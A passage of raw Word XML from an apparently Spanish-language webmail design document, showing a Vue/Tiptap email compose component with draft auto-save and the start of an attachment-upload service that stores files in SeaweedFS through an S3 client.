        <w:t xml:space="preserve">        class="flex-1 bg-transparent border-b dark:text-white dark:border-gray-600 focus:outline-none focus:border-blue-500 pb-1"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      /&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;div class="flex items-center gap-2 p-3 border-b dark:border-gray-700"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;input</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        v-model="compose.subject"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        placeholder="Asunto"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        class="flex-1 bg-transparent dark:text-white focus:outline-none"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      /&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;!-- Tiptap Toolbar --&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;div class="flex gap-1 p-2 border-b dark:border-gray-700 bg-gray-50 dark:bg-gray-800"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;button @click="editor?.chain().focus().toggleBold().run()" :class="{ 'bg-gray-200': editor?.isActive('bold') }" class="p-1.5 rounded hover:bg-gray-200 dark:hover:bg-gray-600"&gt;B&lt;/button&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;button @click="editor?.chain().focus().toggleItalic().run()" :class="{ 'bg-gray-200': editor?.isActive('italic') }" class="p-1.5 rounded hover:bg-gray-200 italic dark:hover:bg-gray-600"&gt;I&lt;/button&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;button @click="editor?.chain().focus().toggleStrike().run()" :class="{ 'bg-gray-200': editor?.isActive('strike') }" class="p-1.5 rounded hover:bg-gray-200 line-through dark:hover:bg-gray-600"&gt;S&lt;/button&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;div class="w-px h-6 bg-gray-300 mx-1" /&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;button @click="addLink" class="p-1.5 rounded hover:bg-gray-200 dark:hover:bg-gray-600"&gt;🔗&lt;/button&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;button @click="editor?.chain().focus().toggleBulletList().run()" class="p-1.5 rounded hover:bg-gray-200 dark:hover:bg-gray-600"&gt;• List&lt;/button&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;editor-content :editor="editor" class="flex-1 overflow-y-auto p-4 prose dark:prose-invert max-w-none" /&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;div class="p-3 border-t dark:border-gray-700 flex items-center gap-3"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;button</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        @click="send"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        :disabled="sending"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        class="bg-blue-600 hover:bg-blue-700 disabled:opacity-50 text-white px-6 py-2 rounded-lg font-medium"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        {{ sending ? 'Enviando...' : 'Enviar' }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;/button&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;button @click="saveDraft" class="text-gray-600 hover:text-gray-800 dark:text-gray-400 dark:hover:text-gray-200"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        Guardar borrador</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;/button&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;span v-if="lastSaved" class="text-xs text-gray-400 ml-auto"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        Guardado {{ formatDistanceToNow(lastSaved, { addSuffix: true, locale: es }) }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;/span&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/div&gt;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 useEditor, EditorContent } from '@tiptap/vue-3';</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">import StarterKit from '@tiptap/starter-kit';</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">import Link from '@tiptap/extension-link';</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">import { ref, onBeforeUnmount, watch } from 'vue';</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">import { formatDistanceToNow } from 'date-fns';</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">import { es } from 'date-fns/locale';</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">const props = defineProps&lt;{ replyTo?: Email; forward?: Email }&gt;();</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">const editor = useEditor({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  extensions: [StarterKit, Link.configure({ openOnClick: false })],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  content: props.replyTo ? buildQuote(props.replyTo) : '',</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">});</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">const compose = reactive({ to: '', cc: '', bcc: '', subject: props.replyTo ? `Re: ${props.replyTo.subject}` : '' });</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">const sending = ref(false);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">const lastSaved = ref&lt;Date | null&gt;(null);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">// Auto-save cada 10 segundos</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">let autoSaveInterval: ReturnType&lt;typeof setInterval&gt;;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">onMounted(() =&gt; {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  autoSaveInterval = setInterval(() =&gt; {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (editor.value?.getText().trim()) saveDraft();</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  }, 10000);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">});</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">onBeforeUnmount(() =&gt; {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  clearInterval(autoSaveInterval);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  editor.value?.destroy();</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">});</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">async function saveDraft() {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  await api.post('/compose/draft', {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ...compose,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    bodyHtml: editor.value?.getHTML(),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    bodyText: editor.value?.getText(),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  });</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  lastSaved.value = new Date();</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="192"/>
    <w:bookmarkStart w:id="193" w:name="adjuntos-drag-drop-a-seaweedfs"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.4.2 Adjuntos: Drag-Drop a SeaweedFS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/api/src/services/attachments.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { S3Client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> PutObjectCommand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> GetObjectCommand } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'@aws-sdk/client-s3'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { getSignedUrl } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'@aws-sdk/s3-request-presigner'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> s3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S3Client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  endpoint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SEAWEEDFS_ENDPOINT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  region</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'us-east-1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { accessKeyId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'anonymous'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> secretAccessKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'anonymous'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  forcePathStyle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BUCKET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'webmail-attachments'</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AttachmentService {</w:t>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upload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> filename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contentType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fid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crypto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">randomUUID</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s3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">send</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">PutObjectCommand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      Bucket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> BUCKET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      Key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> fid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      Body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      ContentType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> contentType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      Metadata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { filename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fid</w:t>
      </w:r>
      <w:r>
